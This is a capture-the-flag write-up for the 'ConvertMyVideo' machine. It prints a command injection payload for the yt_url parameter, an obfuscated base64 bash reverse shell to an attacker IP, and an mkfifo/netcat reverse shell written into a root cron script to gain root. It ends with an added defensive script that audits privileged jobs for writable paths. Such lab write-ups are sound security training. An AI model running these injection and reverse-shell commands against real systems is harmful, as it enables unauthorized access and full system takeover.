# ConvertMyVideo

## Nmap

```
sudo nmap 10.10.50.86 -p- -sS -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Port 80 lands us on a YouTube video conversion page.

![](/files/-MXE9-_RsS5zykNwM_Gk)

Running feroxbuster against the target website produces only a few results, of which only the /admin directory is interesting. The /admin directory uses an HTTP basic authentication form, and I was unable to crack it using rockyou.txt with common user names such as 'admin'.

![](/files/-MXE9QG0aCY1aE3I2stD)

Running a generic query does not produce anything interesting.

![](/files/-MXE9ijHbPS56gLEN0gQ)

Running the search query through Burp Suite gives us the parameter `yt_url`.

![](/files/-MXEA8rl1LUxrb4DZg_i)

Referring to this link, we can try various command injection techniques for valid parameters.

<https://book.hacktricks.xyz/pentesting-web/command-injection>

As per the link, trying the following gives us a command injection result:

```
yt_url=ls||id;
```

![](/files/-MXEB0KRrJi_3SCeSM7z)

Knowing we can inject commands, we can attempt a reverse shell by running the command below in a terminal on our attacking machine, then taking the output and using it in our command injection:

```
echo "echo $(echo 'bash -i >& /dev/tcp/10.14.3.108/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
```

![](/files/-MXEBT0PtdRp5GR0aOnN)

Then paste the output into Burp Suite:

![](/files/-MXEBdo0MxVsIJRfXTqI)

Once sent we should receive a reverse shell on the `netcat` listener.

![](/files/-MXEBrYsl3Wn_jKepXuF)

After looking about the machine and running enumeration scripts, I was unable to identify any points of escalation. I then decided to run [pspy64](https://github.com/DominicBreuker/pspy/releases) to see if anything is being executed on a regular basis.

After transferring and running it, we get the following results:

![](/files/-MXENqc8FbKaBjNrHhcu)

Frequently the following is being run:

`/bin/sh -c cd /var/www/html/tmp && bash /var/www/html/tmp/clean.sh`

From here I echoed out the contents of clean.sh and replaced the contents with a `netcat` reverse shell.

```
echo  > clean.sh
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.14.3.108 4444 >/tmp/f' > clean.sh
```

Then set up a listener on port 4444, waited a few seconds, and received a shell as root.

![](/files/-MXEQS2X_aUR4KX_Sxv1)
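
The root shell was possible because a job running as root executes a script that the web server user can overwrite. The following check is an added example, not part of the original writeup: it takes a job's command line and flags every named file or directory that is not owned by the trusted user or is group- or world-writable. The function names `unsafe_path` and `audit_job` are hypothetical, and the trusted owner is assumed to be UID 0 unless a second argument is given.

```shell
#!/bin/sh
# Added example (not from the original writeup): flag files and directories
# named in a privileged scheduled job that a lower-privileged user can modify.

# unsafe_path PATH [TRUSTED_UID]
# True when PATH is not owned by TRUSTED_UID (default 0, root) or is
# group- or world-writable. -H follows a symlink given on the command line.
unsafe_path() {
    [ -n "$(find -H "$1" -prune \( ! -user "${2:-0}" -o -perm -020 \
        -o -perm -002 \) -print 2>/dev/null)" ]
}

# audit_job CMDLINE [TRUSTED_UID]
# Checks each existing absolute path in CMDLINE; for a file, also its
# directory, because a writable directory lets the file be replaced.
# Prints one line per finding and returns 1 if anything was flagged.
audit_job() (
    set -f                                  # split on whitespace, no globbing
    status=0
    targets=$(for token in $1; do
        case $token in /*) ;; *) continue ;; esac
        if [ -d "$token" ]; then
            printf '%s\n' "$token"
        elif [ -e "$token" ]; then
            printf '%s\n%s\n' "$token" "$(dirname "$token")"
        fi
    done | sort -u)
    for target in $targets; do
        if unsafe_path "$target" "${2:-0}"; then
            echo "UNSAFE: $target"
            status=1
        fi
    done
    exit "$status"
)

# Usage: pass the job's command line as seen in pspy or the crontab, e.g.
#   sh audit.sh 'cd /var/www/html/tmp && bash /var/www/html/tmp/clean.sh'
if [ "$#" -gt 0 ]; then
    audit_job "$*"
fi
```

Any `UNSAFE` line for a job that runs as root means the script or its directory should be moved out of the web root and set to root ownership with no group or world write bit.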


